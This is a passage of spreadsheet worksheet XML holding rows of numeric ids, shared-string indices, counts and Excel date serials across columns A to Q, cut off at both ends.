        <v>1610</v>
      </c>
      <c r="E4" s="9">
        <v>1035257</v>
      </c>
      <c r="F4" s="9" t="s">
        <v>1611</v>
      </c>
      <c r="G4" s="10">
        <v>40938.524305555555</v>
      </c>
      <c r="H4" s="9">
        <v>23528</v>
      </c>
      <c r="I4" s="9" t="s">
        <v>1612</v>
      </c>
      <c r="J4" s="10">
        <v>40616.71875</v>
      </c>
      <c r="K4" s="9" t="s">
        <v>830</v>
      </c>
      <c r="L4" s="7">
        <v>8</v>
      </c>
      <c r="M4" s="7">
        <v>5</v>
      </c>
      <c r="N4" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="5" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A5" s="3">
        <v>12</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>19</v>
      </c>
      <c r="C5" s="9" t="s">
        <v>1613</v>
      </c>
      <c r="D5" s="9" t="s">
        <v>1614</v>
      </c>
      <c r="E5" s="9">
        <v>61989</v>
      </c>
      <c r="F5" s="9" t="s">
        <v>1615</v>
      </c>
      <c r="G5" s="10">
        <v>41529.674305555556</v>
      </c>
      <c r="H5" s="9">
        <v>1145285</v>
      </c>
      <c r="I5" s="9" t="s">
        <v>1616</v>
      </c>
      <c r="J5" s="10">
        <v>41268.183333333334</v>
      </c>
      <c r="K5" s="3" t="s">
        <v>20</v>
      </c>
      <c r="L5" s="4">
        <v>11</v>
      </c>
      <c r="M5" s="4">
        <v>9</v>
      </c>
      <c r="N5" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O5" s="3"/>
      <c r="P5" s="3"/>
      <c r="Q5" s="3"/>
    </row>
    <row r="6" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A6" s="9">
        <v>19</v>
      </c>
      <c r="B6" s="9" t="s">
        <v>831</v>
      </c>
      <c r="C6" s="9" t="s">
        <v>1617</v>
      </c>
      <c r="D6" s="9" t="s">
        <v>1618</v>
      </c>
      <c r="E6" s="9">
        <v>13</v>
      </c>
      <c r="F6" s="9" t="s">
        <v>1619</v>
      </c>
      <c r="G6" s="10">
        <v>41250.17291666667</v>
      </c>
      <c r="H6" s="9">
        <v>1067051</v>
      </c>
      <c r="I6" s="9" t="s">
        <v>1620</v>
      </c>
      <c r="J6" s="10">
        <v>41249.615277777775</v>
      </c>
      <c r="K6" s="9" t="s">
        <v>832</v>
      </c>
      <c r="L6" s="7">
        <v>12</v>
      </c>
      <c r="M6" s="7">
        <v>10</v>
      </c>
      <c r="N6" s="9" t="s">
        <v>703</v>
      </c>
      <c r="Q6" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="7" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A7" s="9">
        <v>25</v>
      </c>
      <c r="B7" s="9" t="s">
        <v>833</v>
      </c>
      <c r="C7" s="9" t="s">
        <v>1621</v>
      </c>
      <c r="D7" s="9" t="s">
        <v>1622</v>
      </c>
      <c r="E7" s="9">
        <v>3425536</v>
      </c>
      <c r="F7" s="9" t="s">
        <v>1623</v>
      </c>
      <c r="G7" s="10">
        <v>42793.699305555558</v>
      </c>
      <c r="H7" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I7" s="9" t="s">
        <v>1624</v>
      </c>
      <c r="J7" s="10">
        <v>42444.056944444441</v>
      </c>
      <c r="K7" s="9" t="s">
        <v>834</v>
      </c>
      <c r="L7" s="7">
        <v>8</v>
      </c>
      <c r="M7" s="7">
        <v>6</v>
      </c>
      <c r="N7" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O7" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="8" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A8" s="3">
        <v>33</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>21</v>
      </c>
      <c r="C8" s="9" t="s">
        <v>1625</v>
      </c>
      <c r="D8" s="9" t="s">
        <v>1626</v>
      </c>
      <c r="E8" s="9">
        <v>13</v>
      </c>
      <c r="F8" s="9" t="s">
        <v>1619</v>
      </c>
      <c r="G8" s="10">
        <v>40100.089583333334</v>
      </c>
      <c r="H8" s="9">
        <v>14860</v>
      </c>
      <c r="I8" s="9" t="s">
        <v>1627</v>
      </c>
      <c r="J8" s="10">
        <v>39921.551388888889</v>
      </c>
      <c r="K8" s="3" t="s">
        <v>22</v>
      </c>
      <c r="L8" s="4">
        <v>4</v>
      </c>
      <c r="M8" s="4">
        <v>2</v>
      </c>
      <c r="N8" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O8" s="3"/>
      <c r="P8" s="3"/>
      <c r="Q8" s="3"/>
    </row>
    <row r="9" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A9" s="9">
        <v>173</v>
      </c>
      <c r="B9" s="9" t="s">
        <v>835</v>
      </c>
      <c r="C9" s="9" t="s">
        <v>1628</v>
      </c>
      <c r="D9" s="9" t="s">
        <v>1629</v>
      </c>
      <c r="E9" s="9">
        <v>331508</v>
      </c>
      <c r="F9" s="9" t="s">
        <v>1630</v>
      </c>
      <c r="G9" s="10">
        <v>43616.763194444444</v>
      </c>
      <c r="H9" s="9">
        <v>1836618</v>
      </c>
      <c r="I9" s="9" t="s">
        <v>1631</v>
      </c>
      <c r="J9" s="10">
        <v>42968.371527777781</v>
      </c>
      <c r="K9" s="9" t="s">
        <v>836</v>
      </c>
      <c r="L9" s="7">
        <v>19</v>
      </c>
      <c r="M9" s="7">
        <v>17</v>
      </c>
      <c r="N9" s="9" t="s">
        <v>703</v>
      </c>
      <c r="O9" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="10" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A10" s="9">
        <v>264</v>
      </c>
      <c r="B10" s="9" t="s">
        <v>837</v>
      </c>
      <c r="C10" s="9" t="s">
        <v>1632</v>
      </c>
      <c r="D10" s="9" t="s">
        <v>1633</v>
      </c>
      <c r="E10" s="9">
        <v>560648</v>
      </c>
      <c r="F10" s="9" t="s">
        <v>1634</v>
      </c>
      <c r="G10" s="10">
        <v>42489.685416666667</v>
      </c>
      <c r="H10" s="9">
        <v>5469991</v>
      </c>
      <c r="I10" s="9" t="s">
        <v>1635</v>
      </c>
      <c r="J10" s="10">
        <v>42487.691666666666</v>
      </c>
      <c r="K10" s="9" t="s">
        <v>838</v>
      </c>
      <c r="L10" s="7">
        <v>6</v>
      </c>
      <c r="M10" s="7">
        <v>4</v>
      </c>
      <c r="N10" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="11" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A11" s="3">
        <v>396</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>23</v>
      </c>
      <c r="C11" s="9" t="s">
        <v>1636</v>
      </c>
      <c r="D11" s="9" t="s">
        <v>1637</v>
      </c>
      <c r="E11" s="9">
        <v>246246</v>
      </c>
      <c r="F11" s="9" t="s">
        <v>1638</v>
      </c>
      <c r="G11" s="10">
        <v>42845.686111111114</v>
      </c>
      <c r="H11" s="9">
        <v>754215</v>
      </c>
      <c r="I11" s="9" t="s">
        <v>1639</v>
      </c>
      <c r="J11" s="10">
        <v>42838.874305555553</v>
      </c>
      <c r="K11" s="3" t="s">
        <v>24</v>
      </c>
      <c r="L11" s="4">
        <v>11</v>
      </c>
      <c r="M11" s="4">
        <v>9</v>
      </c>
      <c r="N11" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O11" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P11" s="3" t="s">
        <v>704</v>
      </c>
      <c r="Q11" s="3"/>
    </row>
    <row r="12" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A12" s="3">
        <v>451</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>25</v>
      </c>
      <c r="C12" s="9" t="s">
        <v>1640</v>
      </c>
      <c r="D12" s="9" t="s">
        <v>1641</v>
      </c>
      <c r="E12" s="9">
        <v>246246</v>
      </c>
      <c r="F12" s="9" t="s">
        <v>1638</v>
      </c>
      <c r="G12" s="10">
        <v>42845.678472222222</v>
      </c>
      <c r="H12" s="9">
        <v>754215</v>
      </c>
      <c r="I12" s="9" t="s">
        <v>1639</v>
      </c>
      <c r="J12" s="10">
        <v>42842.10833333333</v>
      </c>
      <c r="K12" s="3" t="s">
        <v>26</v>
      </c>
      <c r="L12" s="4">
        <v>3</v>
      </c>
      <c r="M12" s="4">
        <v>1</v>
      </c>
      <c r="N12" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O12" s="3"/>
      <c r="P12" s="3"/>
      <c r="Q12" s="3"/>
    </row>
    <row r="13" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A13" s="9">
        <v>588</v>
      </c>
      <c r="B13" s="9" t="s">
        <v>839</v>
      </c>
      <c r="C13" s="9" t="s">
        <v>1642</v>
      </c>
      <c r="D13" s="9" t="s">
        <v>1643</v>
      </c>
      <c r="E13" s="9">
        <v>73488</v>
      </c>
      <c r="F13" s="9" t="s">
        <v>1644</v>
      </c>
      <c r="G13" s="10">
        <v>40463.098611111112</v>
      </c>
      <c r="H13" s="9">
        <v>73488</v>
      </c>
      <c r="I13" s="9" t="s">
        <v>1644</v>
      </c>
      <c r="J13" s="10">
        <v>40463.098611111112</v>
      </c>
      <c r="K13" s="9" t="s">
        <v>840</v>
      </c>
      <c r="L13" s="7">
        <v>9</v>
      </c>
      <c r="M13" s="7">
        <v>7</v>
      </c>
      <c r="Q13" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="14" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A14" s="3">
        <v>629</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>31</v>
      </c>
      <c r="C14" s="9" t="s">
        <v>1645</v>
      </c>
      <c r="D14" s="9" t="s">
        <v>1646</v>
      </c>
      <c r="E14" s="9">
        <v>122</v>
      </c>
      <c r="F14" s="9" t="s">
        <v>1647</v>
      </c>
      <c r="G14" s="10">
        <v>40429.803472222222</v>
      </c>
      <c r="H14" s="9">
        <v>56555</v>
      </c>
      <c r="I14" s="9" t="s">
        <v>1648</v>
      </c>
      <c r="J14" s="10">
        <v>40427.306944444441</v>
      </c>
      <c r="K14" s="3" t="s">
        <v>32</v>
      </c>
      <c r="L14" s="4">
        <v>3</v>
      </c>
      <c r="M14" s="4">
        <v>1</v>
      </c>
      <c r="N14" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O14" s="3"/>
      <c r="P14" s="3"/>
      <c r="Q14" s="3"/>
    </row>
    <row r="15" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A15" s="3">
        <v>755</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>33</v>
      </c>
      <c r="C15" s="9" t="s">
        <v>1649</v>
      </c>
      <c r="D15" s="9" t="s">
        <v>1650</v>
      </c>
      <c r="E15" s="9">
        <v>679449</v>
      </c>
      <c r="F15" s="9" t="s">
        <v>1651</v>
      </c>
      <c r="G15" s="10">
        <v>41362.640972222223</v>
      </c>
      <c r="H15" s="9">
        <v>112430</v>
      </c>
      <c r="I15" s="9" t="s">
        <v>1652</v>
      </c>
      <c r="J15" s="10">
        <v>41362.640277777777</v>
      </c>
      <c r="K15" s="3" t="s">
        <v>34</v>
      </c>
      <c r="L15" s="4">
        <v>4</v>
      </c>
      <c r="M15" s="4">
        <v>2</v>
      </c>
      <c r="N15" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O15" s="3"/>
      <c r="P15" s="3"/>
      <c r="Q15" s="3"/>
    </row>
    <row r="16" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A16" s="3">
        <v>906</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>35</v>
      </c>
      <c r="C16" s="9" t="s">
        <v>1653</v>
      </c>
      <c r="D16" s="9" t="s">
        <v>1654</v>
      </c>
      <c r="E16" s="9">
        <v>237838</v>
      </c>
      <c r="F16" s="9" t="s">
        <v>1655</v>
      </c>
      <c r="G16" s="10">
        <v>41312.731249999997</v>
      </c>
      <c r="H16" s="9">
        <v>395659</v>
      </c>
      <c r="I16" s="9" t="s">
        <v>1656</v>
      </c>
      <c r="J16" s="10">
        <v>41312.579861111109</v>
      </c>
      <c r="K16" s="3" t="s">
        <v>36</v>
      </c>
      <c r="L16" s="4">
        <v>3</v>
      </c>
      <c r="M16" s="4">
        <v>1</v>
      </c>
      <c r="N16" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O16" s="3"/>
      <c r="P16" s="3"/>
      <c r="Q16" s="3"/>
    </row>
    <row r="17" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A17" s="9">
        <v>1053</v>
      </c>
      <c r="B17" s="9" t="s">
        <v>841</v>
      </c>
      <c r="C17" s="9" t="s">
        <v>1657</v>
      </c>
      <c r="D17" s="9" t="s">
        <v>1658</v>
      </c>
      <c r="E17" s="9">
        <v>13</v>
      </c>
      <c r="F17" s="9" t="s">
        <v>1619</v>
      </c>
      <c r="G17" s="10">
        <v>40809.027777777781</v>
      </c>
      <c r="H17" s="9">
        <v>590042</v>
      </c>
      <c r="I17" s="9" t="s">
        <v>1659</v>
      </c>
      <c r="J17" s="10">
        <v>40809.015972222223</v>
      </c>
      <c r="K17" s="9" t="s">
        <v>842</v>
      </c>
      <c r="L17" s="7">
        <v>5</v>
      </c>
      <c r="M17" s="7">
        <v>3</v>
      </c>
      <c r="N17" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="18" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A18" s="3">
        <v>1120</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>47</v>
      </c>
      <c r="C18" s="9" t="s">
        <v>1660</v>
      </c>
      <c r="D18" s="9" t="s">
        <v>1661</v>
      </c>
      <c r="E18" s="9">
        <v>237838</v>
      </c>
      <c r="F18" s="9" t="s">
        <v>1655</v>
      </c>
      <c r="G18" s="10">
        <v>41312.729861111111</v>
      </c>
      <c r="H18" s="9">
        <v>395659</v>
      </c>
      <c r="I18" s="9" t="s">
        <v>1656</v>
      </c>
      <c r="J18" s="10">
        <v>41312.586111111108</v>
      </c>
      <c r="K18" s="3" t="s">
        <v>48</v>
      </c>
      <c r="L18" s="4">
        <v>3</v>
      </c>
      <c r="M18" s="4">
        <v>1</v>
      </c>
      <c r="N18" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O18" s="3"/>
      <c r="P18" s="3"/>
      <c r="Q18" s="3"/>
    </row>
    <row r="19" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A19" s="3">
        <v>1248</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>49</v>
      </c>
      <c r="C19" s="9" t="s">
        <v>1662</v>
      </c>
      <c r="D19" s="9" t="s">
        <v>1663</v>
      </c>
      <c r="E19" s="9">
        <v>263681</v>
      </c>
      <c r="F19" s="9" t="s">
        <v>1664</v>
      </c>
      <c r="G19" s="10">
        <v>40790.898611111108</v>
      </c>
      <c r="H19" s="9">
        <v>764846</v>
      </c>
      <c r="I19" s="9" t="s">
        <v>1665</v>
      </c>
      <c r="J19" s="10">
        <v>40779.595833333333</v>
      </c>
      <c r="K19" s="3" t="s">
        <v>50</v>
      </c>
      <c r="L19" s="4">
        <v>5</v>
      </c>
      <c r="M19" s="4">
        <v>1</v>
      </c>
      <c r="N19" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O19" s="3"/>
      <c r="P19" s="3"/>
      <c r="Q19" s="3"/>
    </row>
    <row r="20" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A20" s="3">
        <v>1281</v>
      </c>
      <c r="B20" s="5" t="s">
        <v>51</v>
      </c>
      <c r="C20" s="9" t="s">
        <v>1666</v>
      </c>
      <c r="D20" s="9" t="s">
        <v>1667</v>
      </c>
      <c r="E20" s="9">
        <v>35</v>
      </c>
      <c r="F20" s="9" t="s">
        <v>1668</v>
      </c>
      <c r="G20" s="10">
        <v>41313.915972222225</v>
      </c>
      <c r="H20" s="9">
        <v>395659</v>
      </c>
      <c r="I20" s="9" t="s">
        <v>1656</v>
      </c>
      <c r="J20" s="10">
        <v>41312.503472222219</v>
      </c>
      <c r="K20" s="3" t="s">
        <v>52</v>
      </c>
      <c r="L20" s="4">
        <v>3</v>
      </c>
      <c r="M20" s="4">
        <v>1</v>
      </c>
      <c r="N20" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O20" s="3"/>
      <c r="P20" s="3"/>
      <c r="Q20" s="3"/>
    </row>
    <row r="21" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A21" s="9">
        <v>1306</v>
      </c>
      <c r="B21" s="9" t="s">
        <v>843</v>
      </c>
      <c r="C21" s="9" t="s">
        <v>1669</v>
      </c>
      <c r="D21" s="9" t="s">
        <v>1670</v>
      </c>
      <c r="E21" s="9">
        <v>237838</v>
      </c>
      <c r="F21" s="9" t="s">
        <v>1655</v>
      </c>
      <c r="G21" s="10">
        <v>41312.729166666664</v>
      </c>
      <c r="H21" s="9">
        <v>395659</v>
      </c>
      <c r="I21" s="9" t="s">
        <v>1656</v>
      </c>
      <c r="J21" s="10">
        <v>41312.604861111111</v>
      </c>
      <c r="K21" s="9" t="s">
        <v>844</v>
      </c>
      <c r="L21" s="7">
        <v>4</v>
      </c>
      <c r="M21" s="7">
        <v>2</v>
      </c>
      <c r="N21" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="22" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A22" s="3">
        <v>1332</v>
      </c>
      <c r="B22" s="5" t="s">
        <v>53</v>
      </c>
      <c r="C22" s="9" t="s">
        <v>1671</v>
      </c>
      <c r="D22" s="9" t="s">
        <v>1672</v>
      </c>
      <c r="E22" s="9">
        <v>661933</v>
      </c>
      <c r="F22" s="9" t="s">
        <v>1673</v>
      </c>
      <c r="G22" s="10">
        <v>41588.804861111108</v>
      </c>
      <c r="H22" s="9">
        <v>661933</v>
      </c>
      <c r="I22" s="9" t="s">
        <v>1673</v>
      </c>
      <c r="J22" s="10">
        <v>41583.218055555553</v>
      </c>
      <c r="K22" s="3" t="s">
        <v>54</v>
      </c>
      <c r="L22" s="4">
        <v>6</v>
      </c>
      <c r="M22" s="4">
        <v>3</v>
      </c>
      <c r="N22" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O22" s="3" t="s">
        <v>702</v>
      </c>
      <c r="P22" s="3" t="s">
        <v>714</v>
      </c>
      <c r="Q22" s="3"/>
    </row>
    <row r="23" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A23" s="3">
        <v>1375</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>71</v>
      </c>
      <c r="C23" s="9" t="s">
        <v>1674</v>
      </c>
      <c r="D23" s="9" t="s">
        <v>1675</v>
      </c>
      <c r="E23" s="9">
        <v>237838</v>
      </c>
      <c r="F23" s="9" t="s">
        <v>1655</v>
      </c>
      <c r="G23" s="10">
        <v>41312.728472222225</v>
      </c>
      <c r="H23" s="9">
        <v>395659</v>
      </c>
      <c r="I23" s="9" t="s">
        <v>1656</v>
      </c>
      <c r="J23" s="10">
        <v>41312.605555555558</v>
      </c>
      <c r="K23" s="3" t="s">
        <v>72</v>
      </c>
      <c r="L23" s="4">
        <v>3</v>
      </c>
      <c r="M23" s="4">
        <v>1</v>
      </c>
      <c r="N23" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O23" s="3"/>
      <c r="P23" s="3"/>
      <c r="Q23" s="3"/>
    </row>
    <row r="24" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A24" s="3">
        <v>1378</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>73</v>
      </c>
      <c r="C24" s="9" t="s">
        <v>1676</v>
      </c>
      <c r="D24" s="9" t="s">
        <v>1677</v>
      </c>
      <c r="E24" s="9">
        <v>237838</v>
      </c>
      <c r="F24" s="9" t="s">
        <v>1655</v>
      </c>
      <c r="G24" s="10">
        <v>41312.728472222225</v>
      </c>
      <c r="H24" s="9">
        <v>395659</v>
      </c>
      <c r="I24" s="9" t="s">
        <v>1656</v>
      </c>
      <c r="J24" s="10">
        <v>41312.605555555558</v>
      </c>
      <c r="K24" s="3" t="s">
        <v>74</v>
      </c>
      <c r="L24" s="4">
        <v>3</v>
      </c>
      <c r="M24" s="4">
        <v>1</v>
      </c>
      <c r="N24" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O24" s="3"/>
      <c r="P24" s="3"/>
      <c r="Q24" s="3"/>
    </row>
    <row r="25" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A25" s="3">
        <v>1404</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>75</v>
      </c>
      <c r="C25" s="9" t="s">
        <v>1678</v>
      </c>
      <c r="D25" s="9" t="s">
        <v>1679</v>
      </c>
      <c r="E25" s="9">
        <v>200322</v>
      </c>
      <c r="F25" s="9" t="s">
        <v>1680</v>
      </c>
      <c r="G25" s="10">
        <v>41583.536805555559</v>
      </c>
      <c r="H25" s="9">
        <v>2455399</v>
      </c>
      <c r="I25" s="9" t="s">
        <v>1608</v>
      </c>
      <c r="J25" s="10">
        <v>41583.48333333333</v>
      </c>
      <c r="K25" s="3" t="s">
        <v>76</v>
      </c>
      <c r="L25" s="4">
        <v>13</v>
      </c>
      <c r="M25" s="4">
        <v>11</v>
      </c>
      <c r="N25" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O25" s="3" t="s">
        <v>701</v>
      </c>
      <c r="P25" s="3" t="s">
        <v>711</v>
      </c>
      <c r="Q25" s="3"/>
    </row>
    <row r="26" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A26" s="9">
        <v>1476</v>
      </c>
      <c r="B26" s="9" t="s">
        <v>845</v>
      </c>
      <c r="C26" s="9" t="s">
        <v>1681</v>
      </c>
      <c r="D26" s="9" t="s">
        <v>1682</v>
      </c>
      <c r="E26" s="9">
        <v>92</v>
      </c>
      <c r="F26" s="9" t="s">
        <v>1683</v>
      </c>
      <c r="G26" s="10">
        <v>39679.688194444447</v>
      </c>
      <c r="H26" s="9">
        <v>92</v>
      </c>
      <c r="I26" s="9" t="s">
        <v>1683</v>
      </c>
      <c r="J26" s="10">
        <v>39679.688194444447</v>
      </c>
      <c r="K26" s="9" t="s">
        <v>846</v>
      </c>
      <c r="L26" s="7">
        <v>9</v>
      </c>
      <c r="M26" s="7">
        <v>7</v>
      </c>
      <c r="N26" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="27" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A27" s="3">
        <v>1517</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>77</v>
      </c>
      <c r="C27" s="9" t="s">
        <v>1684</v>
      </c>
      <c r="D27" s="9" t="s">
        <v>1685</v>
      </c>
      <c r="E27" s="9">
        <v>199</v>
      </c>
      <c r="F27" s="9" t="s">
        <v>1686</v>
      </c>
      <c r="G27" s="10">
        <v>39726.729861111111</v>
      </c>
      <c r="H27" s="9">
        <v>199</v>
      </c>
      <c r="I27" s="9" t="s">
        <v>1686</v>
      </c>
      <c r="J27" s="10">
        <v>39697.654861111114</v>
      </c>
      <c r="K27" s="3" t="s">
        <v>78</v>
      </c>
      <c r="L27" s="4">
        <v>4</v>
      </c>
      <c r="M27" s="4">
        <v>3</v>
      </c>
      <c r="N27" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O27" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P27" s="3" t="s">
        <v>703</v>
      </c>
      <c r="Q27" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="28" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A28" s="9">
        <v>1669</v>
      </c>
      <c r="B28" s="9" t="s">
        <v>847</v>
      </c>
      <c r="C28" s="9" t="s">
        <v>1687</v>
      </c>
      <c r="D28" s="9" t="s">
        <v>1688</v>
      </c>
      <c r="E28" s="9">
        <v>340</v>
      </c>
      <c r="F28" s="9" t="s">
        <v>1689</v>
      </c>
      <c r="G28" s="10">
        <v>40117.878472222219</v>
      </c>
      <c r="H28" s="9">
        <v>3552</v>
      </c>
      <c r="I28" s="9" t="s">
        <v>1690</v>
      </c>
      <c r="J28" s="10">
        <v>40091.859027777777</v>
      </c>
      <c r="K28" s="9" t="s">
        <v>848</v>
      </c>
      <c r="L28" s="7">
        <v>8</v>
      </c>
      <c r="M28" s="7">
        <v>4</v>
      </c>
      <c r="N28" s="9" t="s">
        <v>703</v>
      </c>
      <c r="O28" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="29" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A29" s="9">
        <v>1711</v>
      </c>
      <c r="B29" s="9" t="s">
        <v>849</v>
      </c>
      <c r="C29" s="9" t="s">
        <v>1691</v>
      </c>
      <c r="D29" s="9" t="s">
        <v>1692</v>
      </c>
      <c r="E29" s="9">
        <v>26428</v>
      </c>
      <c r="F29" s="9" t="s">
        <v>1693</v>
      </c>
      <c r="G29" s="10">
        <v>40561.743750000001</v>
      </c>
      <c r="H29" s="9">
        <v>287316</v>
      </c>
      <c r="I29" s="9" t="s">
        <v>1694</v>
      </c>
      <c r="J29" s="10">
        <v>40561.71875</v>
      </c>
      <c r="K29" s="9" t="s">
        <v>850</v>
      </c>
      <c r="L29" s="7">
        <v>17</v>
      </c>
      <c r="M29" s="7">
        <v>15</v>
      </c>
      <c r="N29" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="30" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A30" s="3">
        <v>1713</v>
      </c>
      <c r="B30" s="5" t="s">
        <v>135</v>
      </c>
      <c r="C30" s="9" t="s">
        <v>1695</v>
      </c>
      <c r="D30" s="9" t="s">
        <v>1696</v>
      </c>
      <c r="E30" s="9">
        <v>5486</v>
      </c>
      <c r="F30" s="9" t="s">
        <v>1697</v>
      </c>
      <c r="G30" s="10">
        <v>40960.875</v>
      </c>
      <c r="H30" s="9">
        <v>9314</v>
      </c>
      <c r="I30" s="9" t="s">
        <v>1698</v>
      </c>
      <c r="J30" s="10">
        <v>40960.167361111111</v>
      </c>
      <c r="K30" s="3" t="s">
        <v>136</v>
      </c>
      <c r="L30" s="4">
        <v>10</v>
      </c>
      <c r="M30" s="4">
        <v>8</v>
      </c>
      <c r="N30" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O30" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P30" s="3"/>
      <c r="Q30" s="3"/>
    </row>
    <row r="31" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A31" s="3">
        <v>1849</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>137</v>
      </c>
      <c r="C31" s="9" t="s">
        <v>1699</v>
      </c>
      <c r="D31" s="9" t="s">
        <v>1700</v>
      </c>
      <c r="E31" s="9">
        <v>117870</v>
      </c>
      <c r="F31" s="9" t="s">
        <v>1701</v>
      </c>
      <c r="G31" s="10">
        <v>41248.317361111112</v>
      </c>
      <c r="H31" s="9">
        <v>1525840</v>
      </c>
      <c r="I31" s="9" t="s">
        <v>1702</v>
      </c>
      <c r="J31" s="10">
        <v>41247.854166666664</v>
      </c>
      <c r="K31" s="3" t="s">
        <v>138</v>
      </c>
      <c r="L31" s="4">
        <v>3</v>
      </c>
      <c r="M31" s="4">
        <v>1</v>
      </c>
      <c r="N31" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O31" s="3" t="s">
        <v>702</v>
      </c>
      <c r="P31" s="3"/>
      <c r="Q31" s="3"/>
    </row>
    <row r="32" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A32" s="9">
        <v>1854</v>
      </c>
      <c r="B32" s="9" t="s">
        <v>851</v>
      </c>
      <c r="C32" s="9" t="s">
        <v>1703</v>
      </c>
      <c r="D32" s="9" t="s">
        <v>1704</v>
      </c>
      <c r="E32" s="9">
        <v>116</v>
      </c>
      <c r="F32" s="9" t="s">
        <v>1705</v>
      </c>
      <c r="G32" s="10">
        <v>40025.464583333334</v>
      </c>
      <c r="H32" s="9">
        <v>5640</v>
      </c>
      <c r="I32" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J32" s="10">
        <v>40023.498611111114</v>
      </c>
      <c r="K32" s="9" t="s">
        <v>852</v>
      </c>
      <c r="L32" s="7">
        <v>4</v>
      </c>
      <c r="M32" s="7">
        <v>2</v>
      </c>
      <c r="N32" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="33" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A33" s="3">
        <v>1879</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>139</v>
      </c>
      <c r="C33" s="9" t="s">
        <v>1707</v>
      </c>
      <c r="D33" s="9" t="s">
        <v>1708</v>
      </c>
      <c r="E33" s="9">
        <v>4374739</v>
      </c>
      <c r="F33" s="9" t="s">
        <v>1709</v>
      </c>
      <c r="G33" s="10">
        <v>42234.417361111111</v>
      </c>
      <c r="H33" s="9">
        <v>454063</v>
      </c>
      <c r="I33" s="9" t="s">
        <v>1710</v>
      </c>
      <c r="J33" s="10">
        <v>42234.401388888888</v>
      </c>
      <c r="K33" s="3" t="s">
        <v>140</v>
      </c>
      <c r="L33" s="4">
        <v>5</v>
      </c>
      <c r="M33" s="4">
        <v>3</v>
      </c>
      <c r="N33" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O33" s="3"/>
      <c r="P33" s="3"/>
      <c r="Q33" s="3"/>
    </row>
    <row r="34" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A34" s="3">
        <v>2511</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>141</v>
      </c>
      <c r="C34" s="9" t="s">
        <v>1711</v>
      </c>
      <c r="D34" s="9" t="s">
        <v>1712</v>
